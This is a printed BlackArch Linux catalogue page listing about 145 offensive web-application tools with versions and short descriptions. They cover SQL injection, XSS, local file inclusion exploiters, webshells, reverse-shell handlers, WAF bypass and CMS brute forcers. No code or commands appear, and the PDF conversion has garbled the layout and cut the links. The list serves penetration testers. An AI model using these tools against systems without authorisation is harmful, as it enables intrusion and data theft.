You are on page 1of 11

Webapp tools


Over 1800 tools

Webapp The list

Home (index.html) / tools (tools.html) / webapp

Packages that primarily attack social networking sites.

Tool count: 145 ()

BlackArch webapp

Name Version Description Homepage

Web security tool to make
0d1n 201.977b1d7 fuzzing at HTTP inputs, (
made in C with libCurl.

1 of 11 6/9/17, 6:54 PM
Webapp tools

Name Version Description Homepage

Simple admin panel finder
adfind 19.8d62713 for php,js,cgi,asp and aspx
admin panels.
This python script looks for
a large amount of possible (
adminpagefinder 0.1
administrative interfaces on /112855/Admin-Page-Finder-Script.html)
a given site.
A SQLi exploitation
albatar 24.142f892 (
framework in Python.
A XSS vulnerability (
anti-xss 165.6534a4d
scanner. /anti-XSS)
A feature-full, modular,
high-performance Ruby
framework aimed towards
arachni 1.5.1 helping penetration testers (
and administrators
evaluate the security of
web applications.
bbqsql 259.4f7c086 SQL injection exploit tool. (
A tiny Batch weB
bbscan 35.995e1ea (
vulnerability Scanner.
This is a python script for
searching Bing for sites
bing-lfi-rfi 0.1 that may have local and
remote file inclusion
Cross-Site Scripting (
brutexss 54.ba753df
Bruteforcer. /shawarkhanethicalhacker/BruteXSS)
Blind SQL Injection Brute
bsqlbf 2.7 (
Blind SQL injection
bsqlinjector 8.5dc3f27 exploitation tool written in (
A python-based Web
cansina 174.850603e (
Content Discovery Tool.
Tool that generates a PHP
capable of run a custom
binary (like a meterpreter)
chankro 3.c150607 or a bash script (p.e.
reverse shell) bypassing
disable_functions &
Drag and Drop
ClickJacking exploit
cjexploiter 6.72b08d8 (
development assistance
Python script to bypass
cloudflare from command (
cloudget 53.807d08e
line. Built upon cfscrape /cloudget)

2 of 11 6/9/17, 6:54 PM
Webapp tools

Name Version Description Homepage

Joomla, Mambo,
PHP-Nuke, and XOOPS
cms-few 0.1 CMS SQL injection
vulnerability scanning tool
written in Python.
Fuzzer for wordpress, cold
cmsfuzz 5.6be5a98 fusion, drupal, joomla, and
Automated All-in-One OS
commix 852.4dac77e Command Injection and
Exploitation Tool.
Web recon tool (find
temporary files, parse
robots.txt, search folders,
crawlic 51.739fe2b (
google dorks and search
domains hosted on same
Project attempts to give
csrftester 1.0 developers the ability to
test their applications for
CSRF flaws.
A Python Web path
cybercrowl 87.26bef0f (
scanner tool.
This tool will try to find
every website that host at (
darkjumper 5.8
the same server at your /darkjumper/)
Fingerprints servers, finds
davscan 23.ce342c0 (
exploits, scans WebDAV.
Tool for finding path of
dff-scanner 1.1 predictable resource (
C CLI implementation of (
dirbuster-ng 9.0c34920
the Java dirbuster tool. /dirbuster-ng)
HTTP(S) directory/file brute (
dirsearch 204.fb88b47
forcer. /dirsearch)
A tool used for
domi-owned 41.583d0a5 compromising IBM/Lotus
Domino servers.
Passive Vulnerability
doork 6.90c7260 (
drupal- Enumerate on drupal (
module-enum modules. module-enumeration)
Simple non-intrusive (
drupalscan 0.5.2
Drupal scanner. /gems/DrupalScan/)
A fully functional File
inclusion vulnerability
scanner (supporting GET
dsfs 32.e27d6cb (
and POST parameters)
written in under 100 lines
of code.

3 of 11 6/9/17, 6:54 PM
Webapp tools

Name Version Description Homepage

A fully functional
JavaScript library
dsjs 21.79cb2c4 vulnerability scanner (
written in under 100 lines
of code.
A fully functional SQL
injection vulnerability
scanner (supporting GET
dsss 116.6d14edb (
and POST parameters)
written in under 100 lines
of code.
A fully functional Cross-site
scripting vulnerability
scanner (supporting GET
dsxs 117.7fd87d0 (
and POST parameters)
written in under 100 lines
of code.
Tool which aims to lure
attackers using various
types of web vulnerability
epicwebhoneypot 2.0a scanners by tricking them
into believing that they
have found a vulnerability
on a host.
Designed to take
screenshots of websites,
provide some server (
eyewitness 605.537d82a
header info, and identify /EyeWitness)
default credentials if
fbht 70.d75ae93 A Facebook Hacking Tool
This is a framework for
HTTP related attacks. It is
written in Perl with a GTK
interface, has a proxy for (
fhttp 1.3
debugging and /104315/FHTTP-Attack-Tool.3.html)
manipulation, proxy
chaining, evasion rules,
and more.
An extremely fast and
filebuster 29.3764608 (
flexible web fuzzer.
Webkit based webclient
ghost-py 0.2.3 (
(relies on PyQT).
A repository with 3 tools for
gittools 23.d2455b3 pwn'ing websites with .git
repositories available'.
Opensource web security
golismero 50.3af264a (
testing framework.
A web application scanner.
Basically it detects some
grabber 0.1 (
kind of vulnerabilities in
your website.

4 of 11 6/9/17, 6:54 PM
Webapp tools

Name Version Description Homepage

A web application analysis
tool for detecting
htcap 45.e54399f (
communications between
javascript and the server.
A set of shell tools that let
you manipulate, send,
receive, and analyze HTTP
messages. These tools can
be used to test, discover, (
httpforge 11.02.01
and assert the security of /98109/HTTPForge.02.01.html)
Web servers, apps, and
sites. An accompanying
Python library is available
for extensions.
"Repeater" style XSS
httppwnly 47.528a664 post-exploitation tool for (
mass browser control.
Penetration testing tool that
would take as input a list of
domain names, scan them,
determine if wordpress or
joomla platform was used
jaidam 10.a7d7c4a and finally check them
automatically, for web
vulnerabilities using two
well-known open source
tools, WPScan and
Jboss verify and
jexboss 86.338b531 (
Exploitation Tool.
This php script fingerprints
a given Joomla system and
then uses Packet Storm's
jomplug 0.1 /121390/Janissaries-Joomla-Fingerprint-
archive to check for bugs
related to the installed
A Joomla password brute
jooforce 11.43c21ad (
force tester.
Joomla scanner scans for
known vulnerable remote (
joomlascan 1.2
file inclusion paths and /62126/
A black box, Ruby
joomlavs 230.e26b637 powered, Joomla (
vulnerability scanner.
Detects file inclusion, sql
injection, command
joomscan 2012.03.10 (
execution vulnerabilities of
a target Joomla! web site.
A Java application for
jsql-injection 0.79 automatic SQL database (
kadimus 50.5897871 LFI Scan & Exploit Tool. (

5 of 11 6/9/17, 6:54 PM
Webapp tools

Name Version Description Homepage

A web application
fingerprinting engine
kolkata 3.0 written in Perl that (
combines cryptography
with IDS evasion.
This perl script leverages
/proc/self/environ to
lfi-exploiter 1.1 attempt getting code
execution out of a local file
inclusion vulnerability..
A simple tool to help in the
fuzzing for, finding, and
exploiting of local file (
lfi-fuzzploit 1.1
inclusion vulnerabilities in /106912/LFI-Fuzzploit-Tool.1.html)
Linux-based PHP
A simple script to infect
images with PHP (
lfi-image-helper 0.8
Backdoors for local file /129871/LFI-Image-Helper.8.html)
inclusion attacks.
This tool helps you exploit
LFI (Local File Inclusion)
vulnerabilities. Post
discovery, simply pass the (
lfi-sploiter 1.0 affected URL and /96056/Simple-Local-File-Inclusion-
vulnerable parameter to Exploiter.0.html)
this tool. You can also use
this tool to scan a URL for
LFI vulnerabilities.
A unique automated LFi
lfifreak 21.0c6adef Exploiter with
Bind/Reverse Shells.
This script is used to take
the highest beneficts of the
lfimap 1.4.8 local file include (
vulnerability in a
A Local File Inclusion
liffy 65.8011cdd (
Exploitation tool.
Python framework for
lightbulb 27.a77c818 auditing web applications
Scan a Magento site for (
magescan 1.12.5
information. /magescan)
Web Command Injection 9.8b34f1a (
Tool for scanning the HTTP
methods supported by a
webserver. It works by
metoscan 05 (
testing a URL and
checking the responses for
the different requests.

6 of 11 6/9/17, 6:54 PM
Webapp tools

Name Version Description Homepage

Path Traversal checking
morxtraversal 1.0 (
Automatic SQL injection
utility using a lsit of URI
multiinjector 0.4 (
addresses to test
parameter manipulation.
Automated Mongo
nosqlmap 194.da333c3 database and NoSQL web
application exploitation tool
A webshell framework for (
novahot 1.0.1
penetration testers. /novahot)
OWASP Directory Access (
opendoor 107.a913a17
scanner. web/OpenDoor)
A web application
owasp-bywaf 26.e730d1b penetration testing
framework (WAPTF).
The Offensive (Web) (
owtf 1017.0bbeea1
Testing Framework. /OWASP_OWTF)
An intercepting proxy for
pappy-proxy 66.cd9b3ef (
web application testing.
Java-based HTTP/HTTPS
proxy for assessing web
app vulnerabilities.
Supports editing/viewing
paros 3.2.13 HTTP messages on-the-fly, (
spiders, client certificates,
proxy-chaining, intelligent
scanning for XSS and
SQLi, etc.
Web Payload list editor to
use techniques to try (
payloadmask 16.ff38964
bypass web application /payloadmask)
A tool to take screenshots
peepingtom 56.bc6f4d8 of websites. Much like
A Findsock Shell
php-findsock-shell2.b8a984f implementation in PHP +
Stealth post-exploitation
phpsploit 749.f34864d (
Wordpress finger printer
plecost 88.149fd34 (
A security scanner for
plown 13.ccf998c (
Plone CMS.
THE REAL hacker friendly
proxenet 712.67fc6b5 proxy for web application (
Free web-application
pyfiscan 1920.bd6fd54 vulnerability and version (
Web backdoor - infector -
riwifshell 38.40075d5 (

7 of 11 6/9/17, 6:54 PM
Webapp tools

Name Version Description Homepage

A tool to abuse Exchange
ruler 195.152d9a4 (
The Remote Web
Workplace Attack tool will
perform a dictionary attack
against a live Microsoft
Windows Small Business (
rww-attack 0.9.2 Server's 'Remote Web /79021/Remote-Web-Workplace-Attack-
Workplace' portal. It Tool.html)
currently supports both
SBS 2003 and SBS 2008
and includes features to
avoid account lock out.
sawef 28.e65dc9f Send Attack Web Forms. (
A fast high-level scraping
scrapy 1.4.0 and web crawling (
Web Apps Scanner and
secscan 1.5 (
Much more utilities.
A web fuzzing script written (
shortfuzzy 0.1
in perl. /104872/Short-Fuzzy-Rat-Scanner.html)
PHP Command Injection
smplshllctrlr 9.2baf390 (
exploitation tool.
Automatic XSS filter
snuck 6.76196b6 (
Static Php Analysis and
spaf 11.671a976 (
An open source tool written
in python to audit web
sparty 0.1 applications using (
sharepoint and frontpage
Configurable web resource (
spiga 460.59d653c
scanner. n-tools/blob/master/
A Proxy for detecting
spike-proxy 148 vulnerabilities in web
SPIP (CMS) scanner for
spipscan 69.4ad3235 penetration testing purpose (
written in Python.
sqid 0.3 A SQL injection digger. (
Automatic SQL injection
sqlmap 1.1.6 (
and database takeover tool
Automatic SQL injection
themole 0.3 (
exploitation tool.
Automatic Server-Side
Template Injection
tplmap 650.1a033c3 (
Detection and Exploitation
Enumerate Typo3 version (
typo-enumerator 77.9565029
and extensions. Enumerator)

8 of 11 6/9/17, 6:54 PM
Webapp tools

Name Version Description Homepage

A script that automates
detection of security flaws
uppwn 5.b7cdd93 (
on websites' file upload
Generate and test domain
typos and variations to
detect and perform typo (
urlcrazy 0.5
squatting, URL hijacking, /research/urlcrazy)
phishing, and corporate
A python tool to extract
URL addresses from
urldigger 02c different HOT sources (
and/or detect SPAM and
malicious code
A comprehensive web
penetration testing tool (
vanguard 0.1 written in Perl thatidentifies /110603/Vanguard-Pentesting-
vulnerabilities in web Scanner.html)
A black box vBulletin
vbscan 25.27c77e9 vulnerability scanner (
written in perl.
An open source platform to
vega 1.0 test the security of web (
Black box tool for
vsvbp 6.241a7ab Vulnerability detection in
web applications.
vulnerabilities- A tool to scan for web (
spider vulnerabilities. /Vulnerabilities-spider)
A tool which contains two
wafninja 18.f9ec0ae functions to attack Web
Application Firewalls.
An easy to use Web
Application Finger Printing (
wafp 0.01_26c3 tool written in ruby using /84468/Web-Application-Finger-
sqlite3 databases for Printer.01-26c3.html)
storing the fingerprints.
Analysing parameters with
all payloads' bypass
wafpass 44.624ac65 methods, aiming at
benchmarking security
solutions like WAF.
Download the entire
waybackpack 49.36db906 Wayback Machine archive (
for a given URL.
A plugin based scanner for
web-soul 2 attacking and data mining
web sites written in Perl.
A handler for PHP system
webhandler 334.bcc9f0d functions & also an (
alternative 'netcat' handler.

9 of 11 6/9/17, 6:54 PM
Webapp tools

Name Version Description Homepage

A tool designed for brute
webslayer 5 (
forcing Web Applications.
An OWASP Top 10
webxploiter 56.c03fe6b (
Security scanner.
Tool to perform user and
whatsmyname 203.d4a9651 username enumeration on
various websites.
Tool tod etect if a given
whichcdn 22.5fc6ddd website is protected by a (
Content Delivery Network.
WebApp Information
wig 574.d5ddd91 (
A perl script that consists
of a port scanner, LFI
scanner, MD5 bruteforcer, (
witchxtool 1.1 dork SQL injection /97465/Witchxtool-Port-LFI-SQL-Scanner-
scanner, fresh proxy And-MD5-Bruteforcing-Tool.1.html)
scanner, and a dork LFI
A Ruby framework for
developing and using
wordpress- modules which aid in the (
exploit-framework penetration testing of exploit-framework)
WordPress powered
websites and systems.
wpforce 66.609ea93 Wordpress Attack Suite. (
Black box WordPress
wpscan 2.9.2 (
vulnerability scanner
Simple Wordpress Security
wpseku 16.e5dc097 (
A modular framework for
ws-attacker 1.7 web services penetration (
Interactive cli tool for HTTP
wuzz 187.b289c84 (
XSS spider - 66/66 wavsep (
xsscrapy 138.f859faa
XSS detected. /xsscrapy)
A penetration testing tool
xsser 1.7 for detecting and exploiting (
XSS vulnerabilites.
An automated XSS
xssless 45.8e7ebe1 payload generator written
in python.
Web Application XSS
xsspy 50.9c76ec7 (
A brute force cross site
xsss 0.40b (
scripting scanner.
Command line tool for
detection of XSS attacks in
xssscan 17.7f1ea90 URLs. Based on
ModSecurity rules from

10 of 11 6/9/17, 6:54 PM
Webapp tools

Name Version Description Homepage

An automatic XSS
xsssniper 0.9 (
discovery tool
A Cross Site Scripting
xssya 13.cd62817 Scanner & Vulnerability
Automatic WAF bypass
xwaf 119.cb7964a (
yaaf 7.4d6273a Yet Another Admin Finder. (
A ruby script that scans for
vulnerable & exploitable
yasuo 117.8fd52f2 (
3rd-party web applications
on a network.
The YAWAST Antecedent
yawast 416.8ed019e Web Application Security (
A web crawler that is useful
for grabbing all user
supplied input related to a (
ycrawler 0.1
given website and will save /98546/yCrawler-Web-Crawling-Utility.html)
the output. It has proxy and
log file support.
A proof-of-concept tool for
generating payloads that
ysoserial 0.0.4 (
exploit unsafe Java object
Integrated penetration
testing tool for finding
zaproxy 2.6.0 (
vulnerabilities in web

( ( (irc://

/blackarch) ( (

BlackArch Linux 2013-2017

11 of 11 6/9/17, 6:54 PM